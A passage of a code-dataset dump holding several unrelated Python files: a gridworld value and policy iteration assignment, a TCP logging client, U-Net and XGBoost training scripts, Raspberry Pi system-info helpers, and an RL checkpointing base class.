np.inf)\n if delta < theta:\n break\n its += 1\n return V, max_deltV, its\n\ndef policy(mdp, V):\n # Initialize the policy list of crrect length\n PI = np.random.choice(env.actions(), len(mdp.states()))\n \n \"\"\"\n YOUR CODE HERE:\n Problem 1b) Implement Policy function \n \n Input arguments:\n - mdp Is the markov decision problem\n - V Is the optimal falue function, found with value iteration\n \"\"\"\n #raise Exception(\"Not implemented\")\n for s in mdp.states():\n if len(mdp.actions(s))==0:\n PI[s] = 0\n else:\n PI[s] = mdp.actions(s)[np.argmax([np.sum([mdp.transition_probability(s, a, s_next)*(mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states()]) for a in mdp.actions(s)])]\n return PI\n\n#################### Problem 2: Policy Iteration #################### \ndef policy_evaluation(mdp, gamma, PI, V, theta = 1e-3): \n \"\"\"\n YOUR CODE HERE:\n Problem 2a) Implement Policy Evaluation\n \n Input arguments: \n - mdp Is the markov decision problem\n - gamma Is discount factor\n - PI Is current policy\n - V Is preveous value function guess\n - theta Is small threshold for determining accuracy of estimation\n \n Some useful tips:\n - If you decide to do exact policy evaluation, np.linalg.solve(A, b) can be used\n optionally scipy has a sparse linear solver that can be used\n - If you decide to do exact policy evaluation, note that the b vector simplifies\n since the reward R(s', s, a) is only dependant on the current state s, giving the \n simplified reward R(s) \n \"\"\"\n n = len(mdp.states())\n A = np.zeros((n,n))\n b = np.zeros(n)\n for s in mdp.states():\n A[s] = gamma*np.array([mdp.transition_probability(s, PI[s], s_next) for s_next in mdp.states()])\n if len(mdp.actions(s))==0:\n b[s] = -mdp.reward(s)\n else:\n b[s] = -np.sum([mdp.transition_probability(s, PI[s], s_next)*mdp.reward(s) for s_next in mdp.states()])\n 
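# The loop above filled A with gamma * P_pi row by row; subtracting the identity\n    # below turns the system into (gamma*P_pi - I) V = -R, i.e. the exact policy\n    # evaluation solve V = (I - gamma*P_pi)^{-1} R.\n    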
A[np.diag_indices(n)] -= 1\n V = np.linalg.solve(A, b)\n return V\n\ndef iterative_policy_evaluation(mdp, gamma, PI, V, theta = 1e-3): \n \"\"\"\n YOUR CODE HERE:\n Problem 2a) Implement Policy Evaluation\n \n Input arguments: \n - mdp Is the markov decision problem\n - gamma Is discount factor\n - PI Is current policy\n - V Is preveous value function guess\n - theta Is small threshold for determining accuracy of estimation\n \n Some useful tips:\n - If you decide to do exact policy evaluation, np.linalg.solve(A, b) can be used\n optionally scipy has a sparse linear solver that can be used\n - If you decide to do exact policy evaluation, note that the b vector simplifies\n since the reward R(s', s, a) is only dependant on the current state s, giving the \n simplified reward R(s) \n \"\"\"\n V = np.zeros((len(mdp.states())))\n while True:\n delta = 0\n for i in range(len(mdp.states())):\n s = mdp.states()[i]\n v = V[i]\n if len(mdp.actions(s)) == 0:\n V[i] = mdp.reward(s)\n else:\n V[i] = sum(mdp.transition_probability(s, PI[s], s_next) * (mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states())\n delta = max(delta, abs(v - V[i]))\n if delta < theta:\n break\n\n #print(V)\n return V\n\ndef policy_iteration(mdp, gamma):\n # Make a valuefunction, initialized to 0\n V = np.zeros((len(mdp.states())))\n \n # Create an arbitrary policy PI\n PI = np.random.choice(env.actions(), len(mdp.states()))\n its = 0\n \"\"\"\n YOUR CODE HERE:\n Problem 2b) Implement Policy Iteration\n \n Input arguments: \n - mdp Is the markov decision problem\n - gamma Is discount factor\n\n Some useful tips:\n - Use the the policy_evaluation function from the preveous subproblem\n \"\"\"\n #raise Exception(\"Not implemented\")\n max_deltV = 0\n V_OLD = np.zeros((len(mdp.states())))\n while True:\n PI_old = deepcopy(PI)\n V_OLD = deepcopy(V)\n V = policy_evaluation(mdp, gamma, PI, V)\n for i in range(len(mdp.states())):\n s = mdp.states()[i]\n if len(mdp.actions(s)) == 0:\n PI[i] = 0\n else:\n best_policy_idx = np.argmax([sum(mdp.transition_probability(s, a, s_next) * (mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states()) for a in mdp.actions(s)])\n PI[i] = mdp.actions(s)[best_policy_idx]\n if np.array_equal(PI, PI_old):\n break\n if max_deltV < np.linalg.norm(V-V_OLD, np.inf):\n max_deltV = np.linalg.norm(V-V_OLD, np.inf)\n its += 1\n return PI, V, max_deltV, its\n\nif __name__ == \"__main__\":\n \"\"\"\n Change the parameters below to change the behaveour, and map of the gridworld.\n gamma is the discount rate, while filename is the path to gridworld map. 
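The script below uses gamma = 1 and the tiny map by default; edit those two variables to experiment. 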
Note that\n this code has been written for python 3.x, and requiers the numpy and matplotlib\n packages\n\n Available maps are:\n - gridworlds/tiny.json\n - gridworlds/large.json\n \"\"\"\n gamma = 1\n filname = \"gridworlds/tiny.json\"\n\n\n # Import the environment from file\n env = gridWorld(filname)\n\n # Render image\n fig = env.render(show_state = False)\n plt.show()\n \n # Run Value Iteration and render value function and policy\n V, max_deltv, its = value_iteration(mdp = env, gamma = gamma)\n print(f'Value iteration:\\nmax_deltV: {max_deltv}, its: {its}')\n show_value_function(env, V)\n \n PI = policy(env, V)\n show_policy(env, PI)\n \n # Run Policy Iteration and render value function and policy\n PI, V, max_deltv, its = policy_iteration(mdp = env, gamma = gamma)\n print(f'Policy iteration:\\nmax_deltV: {max_deltv}, its: {its}')\n\n show_value_function(env, V)\n show_policy(env, PI)\n plt.show()\n","sub_path":"assignment1/assignment1.py","file_name":"assignment1.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"50879703","text":"import socket\nimport string\nfrom datetime import datetime\n\nchoice = 1\nmessage = 'test'\nport = input('port: ')\nhost= raw_input('host: ')\nconnected = 0\nwasInFour = 0\nwhile choice < 5:\n print('Press:\\n1-to connect to host - necessarily!\\n2-to write & send the message\\n3-to send the default message\\n4-to close the connection\\n5-to quit')\n choice = input()\n if choice == 1:\n s =socket.socket()\n s.connect((host,port))\n wasInFour = 0\n current_datetime_connection = datetime.now()\n print('Client succesfully connected')\n if choice == 2: #Write a message\n # print()\n message = raw_input('Write a client message: ')\n choice = 3\n if choice == 3: #Connect+send+record+close\n current_datetime_sent = datetime.now()\n s.send(message.encode())\n # print ('sent: ' + str(current_datetime_sent) + \" - \" + message)\n with open('log_client.txt','a') as f:\n print ('file opened')\n print ('receiving data...')\n while True :\n data=s.recv(1024)\n if not data:\n break\n current_datetime_responce = datetime.now()\n # mes = current_datetime + \" - \" + data\n if connected == 0:\n f.write('**********************************************************************************************\\n')\n f.write('time: ' + str(current_datetime_connection) + ' - connection to host: ' + str(host) + ' port: ' + str(port))\n f.write('\\n\\n')\n connected = 1\n f.write('sent: ' + str(current_datetime_sent) + \" - \" + message)\n f.write('\\n')\n # print(str(current_datetime_responce) + \" - \" + data)\n f.write('response: ' + str(current_datetime_responce) + \" - \" + data[1:])\n f.write('\\n----------------------------------------------------------------\\n\\n')\n if (len(data) < 1024):\n break\n f.close()\n print ('Successfully recieved logs to the file')\n if choice >= 4:\n if wasInFour == 0:\n wasInFour = 1\n with open('log_client.txt','a') as f:\n current_datetime_disconnection = datetime.now()\n f.write('time: ' + str(current_datetime_disconnection) + ' - client has disconnected from host: ' + str(host) + ' port: ' + str(port))\n f.write('\\n*********************************************************************************************\\n\\n')\n f.close\n s.close()\n print ('connection 
closed')\n","sub_path":"TCPClient-python/client_MacOs.py","file_name":"client_MacOs.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279547532","text":"import torch\nfrom model import Lambda_Unet\nfrom skimage import io, transform\nfrom dataset import FluoDataset\nfrom torchvision import transforms, utils\nfrom torch.utils.data import DataLoader\n#from torch.utils.tensorboard import SummaryWriter\nfrom torch import optim\nimport torch.nn as nn\n\ndef train(net,dataset,epochs=10,batch_size=10,lr=0.99,device=\"cpu\"):\n train_loader = DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=8, pin_memory=True)\n optimizer = optim.RMSprop(net.parameters(), lr=lr, weight_decay=1e-8, momentum=0.9)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min' if net.n_classes > 1 else 'max', patience=2)\n\n if net.n_classes > 1:\n criterion = nn.CrossEntropyLoss()\n else:\n criterion = nn.BCEWithLogitsLoss()\n\n for epochs in range(epochs):\n net.train()\n epoch_loss = 0\n for batch in train_loader:\n x = batch[\"image\"].to(device=device)\n y = batch[\"ground_truth\"].to(device=device)\n \n pred = net(x)\n loss = criterion(pred,y)\n epoch_loss += loss.item()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n\n\nif __name__ == '__main__':\n data_transform = transforms.Compose([\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomAffine((0, 360)),\n transforms.Resize(512),\n transforms.ToTensor(),\n\n ])\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n tr_dataset = FluoDataset(\"/home/mhun/data/Fluo-N2DH-GOWT1/01/\", \"/home/mhun/data/Fluo-N2DH-GOWT1/01_GT/TRA/\",\n transform=data_transform, target_transform=data_transform)\n\n net = Lambda_Unet(n_classes=1)\n\n net.to(device=device)\n\n train(net,tr_dataset,epochs=10,batch_size=1,lr=0.99,device=device)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"210972013","text":"#!/usr/bin/python3\n\nimport time\nimport socket \nimport fcntl \nimport struct \nimport sys\nimport subprocess\nimport os\nimport urllib, re\n\ndef get_ram():\n s = subprocess.check_output([\"free\",\"-m\"])\n lines = s.split('\\n') \n return ( int(lines[1].split()[1]), int(lines[2].split()[3]) ) \n\ndef get_up_stats():\n s = subprocess.check_output([\"uptime\"])\n load_split = s.split('load average: ')\n load_five = float(load_split[1].split(',')[1])\n up = load_split[0]\n up_pos = up.rfind(',',0,len(up)-4)\n up = up[:up_pos].split('up ')[1]\n return ( up , load_five ) \n\ndef get_connections():\n s = subprocess.check_output([\"netstat\",\"-tun\"])\n return len([x for x in s.split() if x == 'ESTABLISHED'])\n\ndef get_temphumid():\n \n dht_sensor_location = '/home/webide/repositories/my-pi-projects/RPi-ST7565-Menu/Adafruit_DHT'\n args = \"2302 25\" #format: sensor type (11, 22, 2302), GPIO pin\n sensor_output = subprocess.Popen(dht_sensor_location + ' ' + args, shell=True, stdout=subprocess.PIPE)\n temphumid = sensor_output.communicate()[0]\n temphumid = temphumid.rstrip('\\n')\n if temphumid == '':\n pass\n return temphumid\n\ndef get_ipaddress():\n arg='ip route list'\n p=subprocess.Popen(arg,shell=True,stdout=subprocess.PIPE)\n data = p.communicate()\n split_data = data[0].split()\n ipaddr = split_data[split_data.index('src')+1]\n return ipaddr\n\ndef 
get_cpu_speed():\n    f = os.popen('/opt/vc/bin/vcgencmd get_config arm_freq')\n    cpu = f.read()\n    return cpu\n","sub_path":"Info.py","file_name":"Info.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"128485543","text":"\n\nfrom xai.brain.wordbase.nouns._foam import _FOAM\n\n#class header\nclass _FOAMS(_FOAM):\n\tdef __init__(self): \n\t\t_FOAM.__init__(self)\n\t\tself.name = \"FOAMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"foam\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_foams.py","file_name":"_foams.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"411121989","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 31 19:32:52 2016\n\n@author: p000495138\n\"\"\"\n\nfrom control.matlab import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef main():\n\n    (k1, T1) = (1, 1)    # parameters of first-order lag element 1\n    (k2, T2) = (2, 10)   # parameters of first-order lag element 2\n    G1 = tf([k1],[T1,1])  # transfer-function representation\n    G2 = tf([k2],[T2,1])  # transfer-function representation\n    w = np.logspace(-2,2,100)  # angular frequency (10^-2 to 10^2)\n    bode(G1,G2,w)  # compute and plot the Bode diagram\n    plt.legend([\"T=1, k=1\", \"T=10, k=2\"], loc=3)  # legend\n    plt.show()  # show the result\n\n\nif __name__ == '__main__':\n    main()","sub_path":"04_playground/07_contorl/d01_ボード線図/python_bode.py","file_name":"python_bode.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"90999954","text":"\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage.interpolation import shift\nfrom xgboost import XGBClassifier\nimport pprint\npp = pprint.PrettyPrinter(indent=4)\n\n\nfrom tqdm import tqdm\n\n\nfrom tensorflow.keras.datasets import fashion_mnist\n\n\n#### Helper Functions ####\n\ndef shift_pixels(src, x, y):\n    \"\"\"\n    shift x pixels vertically and y pixels horizontally\n    \"\"\"\n    output = shift(src, [x,y], cval=0)\n\n    return output\n\n\ndef plot_images(images, labels=None, correct_labels=None):\n    '''Plot images with their labels. 
Ten each row'''\n plt.figure(figsize=(20,20))\n columns = 10\n for i, image in enumerate(images):\n ax = plt.subplot(len(images) / columns + 1, columns, i + 1)\n if (not labels is None) and (not correct_labels is None):\n ax.set_title(f\"Wr: {labels[i]} Ri: {correct_labels[i]}\", fontsize=14)\n elif not labels is None:\n ax.set_title(f\"{labels[i]}\", fontsize=16)\n \n plt.axis('off')\n plt.subplots_adjust(bottom=0.1)\n plt.imshow(image, cmap='gray')\n\n\ndef get_samples(n_samples, X, y=None):\n '''Get n_samples randomly'''\n samples_index = np.random.choice(np.arange(len(X)), n_samples, replace=False)\n if not y is None:\n return X[samples_index], y[samples_index]\n return X[samples_index]\n\n\n\n\n\n\n\n\n# #### Pre-process data:\n# - Scale pixel values\n# - Augment the data: shift the images, denoise the images\n# - Flatten the 2D array --> 1D vector\n# \n\n# \n\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nclass DenoiseTransformer(BaseEstimator, TransformerMixin):\n\tdef __init__(self):\n\t\tpass\n\n\tdef fit(self, X, y=None):\n\t\treturn self\n \t\n\tdef denoise(self, src_img, threshold=50, display=False):\n \n\t\tnew_image = np.minimum(src_img, 255)\n\t\tnew_image[new_image < threshold] = 0\n\t\tif display:\n\t\t\tplt.figure(figsize=(15,15))\n\t\t\tplt.subplot(121),plt.imshow(src_img , cmap='gray')\n\t\t\tplt.subplot(122),plt.imshow(new_image , cmap='gray')\n\t\treturn new_image \n\n\n\tdef transform(self, X, y=None):\n\t\t#return np.array([skimage.color.rgb2gray(img) for img in X])\n\t\treturn np.array([self.denoise(img) for img in X])\n\n\n\nclass ShiftTransformer(BaseEstimator, TransformerMixin):\n\tdef __init__(self, y):\n\t\tself.y = y\n\t\tself.n = y.shape[0]\n\t\tpass\n \n\tdef fit(self, X, y=None):\n\t\treturn self\n\n\tdef image_generator(self, src_image, src_label):\n\t\t# create placeholder\n\t\toutput_image = np.zeros((9, *src_image.shape))\n\n\t\toutput_image[0] = shift_pixels(src_image, 1, 0)\n\t\toutput_image[1] = shift_pixels(src_image, -1, 0)\n\t\toutput_image[2] = shift_pixels(src_image, 2, 0)\n\t\toutput_image[3] = shift_pixels(src_image, -2, 0)\n\t\toutput_image[4] = shift_pixels(src_image, 0, 1)\n\t\toutput_image[5] = shift_pixels(src_image, 0, -1)\n\t\toutput_image[6] = shift_pixels(src_image, 0, 2)\n\t\toutput_image[7] = shift_pixels(src_image, 0, -2)\n\t\toutput_image[8] = shift_pixels(src_image, 0, 0)\n\t\toutput_label = np.array([src_label for i in range(9)])\n\n\t\treturn output_image, output_label\n \n\tdef transform(self, X, y=None):\n\t\t#print(y)\n\t\tX_out = np.zeros((self.n * 9, 28, 28))\n\t\ty_out = np.zeros((self.n * 9, ))\n\t\tfor i in tqdm(range(X.shape[0])):\n\t\t\tX_out[i*9: i*9+9], y_out[i*9:i*9+9] = self.image_generator(X[i], self.y[i])\n\t\t\t\n\t\treturn X_out, y_out\n\n\n\n(X_train, y_train), (X_test, y_test) = fashion_mnist.load_data()\n\n\nprint('Training data:', X_train.shape, y_train.shape)\nprint('Test data:', X_test.shape, y_test.shape)\n\n\ndenoise_train = DenoiseTransformer()\nshift_train = ShiftTransformer(y_train)\n\ndenoise_test = DenoiseTransformer()\nshift_test = ShiftTransformer(y_test)\n\ndenoised_X_train = denoise_train.fit_transform(X_train)\nnew_X_train, new_y_train = shift_train.fit_transform(denoised_X_train) \n\ndenoised_X_test = denoise_test.fit_transform(X_test)\nnew_X_test, new_y_test = shift_test.fit_transform(denoised_X_test)\n\nprint('New training data: ', new_X_train.shape)\nprint('New training label:', new_y_train.shape)\n\nprint('New test data: ', new_X_test.shape)\nprint('New test label:', 
new_y_test.shape)\n\n# Normalization\nX_train_flat = new_X_train.reshape((-1, 784)) / 255\nX_test_flat = new_X_test.reshape((-1, 784)) / 255\n\nprint('Training data after normalize:', X_train_flat.shape)\nprint('Test data after normalize:', X_test_flat.shape)\n\n\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.metrics import confusion_matrix, accuracy_score, make_scorer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\n\n\nprint('XGBoost Training....')\n\nmodel_xgboost = XGBClassifier(tree_method='gpu_hist', predictor='gpu_predictor', max_depth=12)\nmodel_xgboost.fit(X_train_flat, new_y_train)\n\ny_train_pred = model_xgboost.predict(X_train_flat)\ny_test_pred = model_xgboost.predict(X_test_flat)\nprint('XGBoost Train accuracy: ', accuracy_score(new_y_train, y_train_pred))\nprint(\"XGBoost Test accuracy:\", accuracy_score(new_y_test, y_test_pred))\n\n\nimport pickle\n\npickle.dump(model_xgboost, open('xgboost.pkl', 'wb'))\n\nexit(0)\n\n\n# In[ ]:\n\n\n#PATH = '/content/gdrive/MyDrive/FTMLE | 2020.11 | Izu/Week_6/Weekly_Project/'\nPATH = './'\n\n\n# In[ ]:\n\n\nX_test_augmented = np.load(PATH + 'FMNIST_augmented_test.npy')\n\n\n# In[ ]:\n\n\nX_test_augmented.shape\n\n\n# In[ ]:\n\n\nnp.min(X_train[3]), np.max(X_train[3]), np.mean(X_train[3]), np.std(X_train[3])\n\n\n# In[ ]:\n\n\nnp.min(X_test_augmented[5]), np.max(X_test_augmented[5]), np.mean(X_test_augmented[5]), np.std(X_test_augmented[5])\n\n\n# In[ ]:\n\n\nplt.figure(figsize=(28,28))\ntest_image = X_test_augmented[50]\nnew_image = np.minimum(test_image, 255)\nnew_image[new_image < 50] = 0\nplt.subplot(121),plt.imshow(test_image , cmap='gray')\nplt.subplot(122),plt.imshow(new_image , cmap='gray')\nplt.show()\n\n\n# In[ ]:\n\n\nimages = get_samples(40, X_test_augmented)\nplot_images(images)\n\n\n# Note: pay close attention to this test set. This test set is slightly different from the train set. In order to improve your model, make sure you know what the difference is so that you can perform the appropriate processing.\n# \n# ** From my observation, the images in the test set are not centered and are shifted around by a few pixels **\n\n# # Submit your predictions as csv file\n\n# In[ ]:\n\n\n# let's make a silly prediction that every image is T-shirt, meaning every prediction is 0\n# Here is how you can make such a prediction\npredictions = np.zeros(shape=[len(X_test_augmented),]).astype(int)\n\n\n# In[ ]:\n\n\npredictions.shape # make sure that you have 40000 predictions, since the hidden test set has 40000 images\n\n\n# In[ ]:\n\n\npred_df = pd.DataFrame(predictions,columns=['pred'])\npred_df.head()\n\n\n# In[ ]:\n\n\nMY_NAME = 'quantran'\n\npred_df.to_csv(PATH + f\"/submissions/{MY_NAME}_submission.csv\", index=None)\n\n\n# By running the cell above, you actually submit your predictions directly to the submissions folder in the Weekly_Project folder, as I have granted you permission to save files there. Let me know if you have any problem running the cell above.\n# \n# \n# \n# Good luck!\n\n# In[ ]:\n\n\nimport cv2 as cv\n\n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\n\n\n# In[ ]:\n\n\nimg = cv.imread('test1.jpg')\nprint(type(img))\ndst = cv.fastNlMeansDenoisingColored(img,None,10,10,7,21)\nplt.subplot(121),plt.imshow(img)\nplt.subplot(122),plt.imshow(dst)\nplt.show()\n\n\n# In[ ]:\n\n\nimg.shape\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"script_xgboost.py","file_name":"script_xgboost.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"474171864","text":"import os\nimport glob\nimport logging\n\nimport torch\nimport numpy as np\n\nfrom .utils import nested_getattr, nested_setattr\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseAlgo(object):\n    \"\"\"\n    Common methods for model checkpointing in pytorch.\n\n    Attributes\n    ----------\n    checkpoint_directory : str\n        The directory where checkpoints are stored. If not set, the checkpoint\n        directory will be taken from ``self.data_logger.logdir``.\n    data_logger : object\n    num_steps : int\n        Total number of training steps. It's assumed that subclasses will\n        increment this in their training loops.\n    checkpoint_interval : int\n        Interval between subsequent checkpoints\n    max_checkpoints : int\n        Total number of checkpoints to maintain in the logging directory.\n        Older checkpoints that exceed this number are deleted.\n    checkpoint_attribs : list\n        List of attributes on the algorithm that ought to be saved at each\n        checkpoint. This should be overridden by subclasses.\n        Note that this implicitly contains ``num_steps``.\n    \"\"\"\n    checkpoint_directory = None\n    data_logger = None\n\n    num_steps = 0\n\n    checkpoint_interval = 100000\n    max_checkpoints = 3\n    checkpoint_attribs = []\n\n    _last_checkpoint = -1\n    _checkpoint_directory = None\n\n    @property\n    def checkpoint_directory(self):\n        return self._checkpoint_directory or (\n            self.data_logger and self.data_logger.logdir)\n\n    @checkpoint_directory.setter\n    def checkpoint_directory(self, value):\n        self._checkpoint_directory = value\n\n    def get_all_checkpoints(self):\n        \"\"\"\n        Return a sorted list of all checkpoints in the log directory.\n        \"\"\"\n        chkpt_dir = self.checkpoint_directory\n        if not chkpt_dir:\n            return []\n        files = glob.glob(os.path.join(chkpt_dir, 'checkpoint-*.data'))\n\n        def step_from_checkpoint(f):\n            try:\n                return int(os.path.basename(f)[11:-5])\n            except ValueError:\n                return -1\n\n        files = [f for f in files if step_from_checkpoint(f) >= 0]\n        return sorted(files, key=step_from_checkpoint)\n\n    def save_checkpoint_if_needed(self):\n        if self._last_checkpoint < 0:\n            self.save_checkpoint()\n        elif self._last_checkpoint + self.checkpoint_interval < self.num_steps:\n            self.save_checkpoint()\n        else:\n            pass  # already have a recent checkpoint\n\n    def save_checkpoint(self):\n        chkpt_dir = self.checkpoint_directory\n        if not chkpt_dir:\n            return\n\n        data = {'num_steps': self.num_steps}\n        for attrib in self.checkpoint_attribs:\n            try:\n                val = nested_getattr(self, attrib)\n            except AttributeError:\n                logger.error(\"Cannot save attribute '%s'\", attrib)\n                continue\n            if hasattr(val, 'state_dict'):\n                val = val.state_dict()\n            data[attrib] = val\n\n        path = os.path.join(chkpt_dir, 'checkpoint-%i.data' % self.num_steps)\n        torch.save(data, path)\n        logger.info(\"Saving checkpoint: '%s'\", path)\n\n        old_checkpoints = self.get_all_checkpoints()\n        for old_checkpoint in old_checkpoints[:-self.max_checkpoints]:\n            
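# Prune old checkpoints: everything except the newest max_checkpoints files is deleted.\n            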
os.remove(old_checkpoint)\n\n self._last_checkpoint = self.num_steps\n\n def load_checkpoint(self, checkpoint_name=None):\n chkpt_dir = self.checkpoint_directory\n if checkpoint_name and os.path.dirname(checkpoint_name):\n # Path includes a directory.\n # Treat it as a complete path name and ignore chkpt_dir\n path = checkpoint_name\n elif chkpt_dir and checkpoint_name:\n path = os.path.join(chkpt_dir, checkpoint_name)\n else:\n checkpoints = self.get_all_checkpoints()\n path = checkpoints and checkpoints[-1]\n if not path or not os.path.exists(path):\n return\n\n if torch.cuda.is_available():\n checkpoint = torch.load(path)\n else:\n checkpoint = torch.load(path, map_location=torch.device('cpu'))\n\n for key, val in checkpoint.items():\n orig_val = nested_getattr(self, key, None)\n if hasattr(orig_val, 'load_state_dict'):\n orig_val.load_state_dict(val)\n else:\n try:\n nested_setattr(self, key, val)\n except AttributeError:\n logger.error(\"Cannot load key '%s'\", key)\n\n self._last_checkpoint = self.num_steps\n\n def tensor(self, data, dtype):\n \"\"\"\n Shorthand for creating a tensor with the current compute device.\n\n Note that this is *much* faster than passing data in list form to\n ``torch.tensor`` directly, at least as of torch v1.3.\n See https://github.com/pytorch/pytorch/issues/13918 for more details.\n \"\"\"\n data = np.asanyarray(data)\n return torch.as_tensor(data, device=self.compute_device, dtype=dtype)\n\n def take_one_step(self, envs):\n \"\"\"\n Take one step in each of the environments.\n\n Returns\n -------\n states : list\n actions : list\n rewards : list\n done : list\n Whether or not each environment reached its end this step.\n \"\"\"\n raise NotImplementedError\n\n def run_episodes(self, envs, num_episodes=None):\n \"\"\"\n Run each environment to completion.\n\n Note that no data is logged in this method. It's instead assumed\n that each environment has a wrapper which takes care of the logging.\n\n Parameters\n ----------\n envs : list\n List of environments to run in parallel.\n num_episodes : int\n Total number of episodes to run. 
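Environments that would finish beyond this count are dropped as they complete. 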
Defaults to the same as number\n of environments.\n \"\"\"\n if num_episodes is None:\n num_episodes = len(envs)\n num_completed = 0\n\n while num_completed < num_episodes:\n data = self.take_one_step(envs)\n num_in_progress = len(envs)\n new_envs = []\n for env, done in zip(envs, data.done):\n if done:\n num_completed += 1\n if done and num_in_progress + num_completed > num_episodes:\n num_in_progress -= 1\n else:\n new_envs.append(env)\n envs = new_envs\n","sub_path":"training/base_algo.py","file_name":"base_algo.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"583172016","text":"#from cv2 import cv2 as cv\nimport cv2 as cv\nimport numpy as np\n\nimg = np.zeros((512,512,3),np.uint8)\nprint(img)\nimg[:]= 255,0,0 # Try 0,255,0\nprint(img.shape)\n\ncv.line(img,(0,100),(img.shape[1],img.shape[0]),(0,255,0),3) # 첫번째는 좌표, 쉐입은 모르겠고, 세번째는 칼라, 네번째는 두께\ncv.rectangle(img,(0,0),(250,350),(0,0,255),2)\ncv.imshow(\"Image\",img)\n\ncv.circle(img,(380,180),30,(255,255,0),3) #첫번째는 좌표, 두번째는 반지름, 세번째괄호는 칼라, 마지막 숫자는 선두께\n\nx,y,w,h = 310,320,150,160\ncv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\ncv.putText(img,\" OPENCV \",(300,270),cv.FONT_HERSHEY_COMPLEX,1,(0,150,0),3)\ncv.imshow(\"Image\",img)\n\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"datas/DrawLines_RectanglesCircles_Text.py","file_name":"DrawLines_RectanglesCircles_Text.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"263106582","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(4) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n 'file:/afs/cern.ch/user/m/melu/work/GEN_validation/CMSSW_9_4_9/src/temp/nomadspin_NLO.root'\n )\n)\n\nprocess.demo = cms.EDAnalyzer('Demo',\n\t\t# lhe = cms.InputTag(\"externalLHEProducer\"),\n\t\t# lhe1 = cms.VInputTag(cms.InputTag(\"externalLHEProducer\"), cms.InputTag(\"source\")),\n)\n\n\nprocess.p = cms.Path(process.demo)\n","sub_path":"GEN_validation/LHE_study/ConfFile_cfg.py","file_name":"ConfFile_cfg.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"12249150","text":"#!D:\\Environment\\Python3\\python\n\nage = int(input('请输入你家狗狗的年龄: '))\n\ntry:\n\tif age < 0 :\n\t print('你在逗我吧!')\n\telif age == 1:\n\t print('相当于 14 岁的人')\n\telif age == 2:\n\t print('相当于 22 岁的人')\n\telif age > 2 :\n\t human = 22 + ( age-2 ) * 5\n\t print('对应人类年龄:', human)\nexcept ValueError:\n\tprint('你输入的有问题')\n\n\ninput('点击 enter 退出')\n","sub_path":"Python/python.class/input.dog.py","file_name":"input.dog.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"140120764","text":"import asyncio\nimport os\nimport signal\nimport sys\n\ntry:\n import gi\nexcept ImportError:\n # app.py is the first module that will be imported when you import toga_gtk.\n #\n # If Gtk can't be imported, it may be because we're in a virtualenv,\n # and the system python libraries aren't visible. 
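In that case importing gi raises ImportError even though PyGObject is installed system-wide. 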
